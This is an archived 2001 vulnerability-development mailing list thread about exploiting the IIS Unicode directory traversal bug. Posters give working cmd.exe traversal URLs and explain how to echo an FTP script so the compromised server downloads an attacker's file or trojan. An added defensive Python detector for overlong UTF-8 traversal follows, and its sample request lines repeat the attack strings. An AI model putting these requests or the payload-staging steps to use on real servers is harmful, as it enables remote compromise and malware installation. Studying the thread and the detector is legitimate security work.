Vulnerability Development mailing list archives

Re: [unicode / iis4]


From: Tim H <tim45738 () HOTMAIL COM>
Date: Mon, 8 Jan 2001 09:59:47 -0600

Hi All,
A lot of these attacks assume that the web directory is on the same drive as
the system and that the system is in the winnt directory.  If neither of
these conditions is true, is this exploit still reasonable?

Thanks,
Tim

-----Original Message-----
From: white hat eagle [mailto:whitehateagle () USA NET]
Sent: Saturday, January 06, 2001 4:32 PM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Re: [unicode / iis4]


Hi folks,
In order to download a file by using mdac.pl or mdac2.pl or the iis/unicode
exploit, you should create a file, say, ftptmp.txt, and you should issue
the following command:
ftp -n -s:ftptmp.txt
where the -n switch will suppress the interactive logon mode and the -s switch
will contain the commands and user credentials.
The contents of ftptmp.txt should be:
open x.x.x.x [or the name of the ftp server]
user
anonymous
me () hacker com
bin
get evilfile
bye
To create this file you should use the "echo" command and redirect the
content to the file ftptmp.txt as follows:
echo open x.x.x.x >ftptmp.txt && echo user >>ftptmp.txt.......
and so on.
Good luck,
whe-

Mad Zigy <zigy () GLOBAL CO ZA> wrote:
Well, I have been able to use msadc2.pl, yet the
commands I give do not work. So I tried the other way
by doing
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+>+c:\test.txt
and all it did was say: The parameter is incorrect.
So then I thought maybe we can't have a > in the string,
so I found the hex of it and tried
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test+%3e+c:\test.txt
yet it still gave me the same: The parameter is
incorrect.
I have been able to make it ftp into my pc by
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+hostname
but I can't make it log in, as I need to echo a script
which I can run:
http://hostname/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ftp+-s:c:\ftp.txt+hostname
so that it will log in and
download the exe / trojan
Thankz zigy!
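
[Added example, not part of the original thread or any poster's code: a detection-side view of the `..%c0%af..` request form quoted above, showing why a `..` check has to run on the path after a lax UTF-8 decode rather than on the raw bytes. It generalizes beyond the thread by also catching three- and four-byte overlong forms; the function names, finding labels and sample request lines are constructed for illustration.]

```python
import re
from urllib.parse import unquote_to_bytes

MIN_CP = (0x80, 0x800, 0x10000)  # smallest code point needing 1, 2, 3 tail bytes

def lenient_decode(raw):
    """Decode UTF-8 as a lax decoder would; also report overlong sequences."""
    out, overlong, i = [], False, 0
    while i < len(raw):
        b = raw[i]
        if b < 0x80:
            n, cp = 0, b
        elif 0xC0 <= b < 0xF8:  # lead byte of a 2-, 3- or 4-byte sequence
            n = 1 if b < 0xE0 else 2 if b < 0xF0 else 3
            cp = b & (0x7F >> (n + 1))
        else:  # stray continuation byte or invalid lead byte
            n, cp = 0, 0xFFFD
        tail = raw[i + 1:i + 1 + n]
        if len(tail) < n or any((t & 0xC0) != 0x80 for t in tail):
            n, cp, tail = 0, 0xFFFD, b""  # truncated or malformed sequence
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if n and cp < MIN_CP[n - 1]:
            overlong = True  # e.g. C0 AF, which a lax decoder turns into "/"
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + n
    return "".join(out), overlong

def classify(uri):
    """Return findings for one request URI; the path is checked after decoding."""
    decoded, overlong = lenient_decode(unquote_to_bytes(uri.partition("?")[0]))
    segments = re.split(r"[/\\]", decoded)
    findings = ["overlong-utf8"] if overlong else []
    if ".." in segments:
        findings.append("traversal")
    if segments[-1].lower() == "cmd.exe":
        findings.append("cmd.exe")
    return findings

SAMPLE_REQUESTS = [  # constructed request lines, not real traffic
    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+echo+test HTTP/1.0",
    "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+echo+test HTTP/1.0",
    "GET /docs/caf%c3%a9.htm HTTP/1.0",
]

def scan(lines):
    """Return {request line: findings} for the lines that raise any finding."""
    results = {line: classify(line.split(" ")[1]) for line in lines}
    return {line: found for line, found in results.items() if found}
```

[`scan(SAMPLE_REQUESTS)` flags the first two lines and leaves the legitimately encoded `caf%c3%a9` request alone.]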


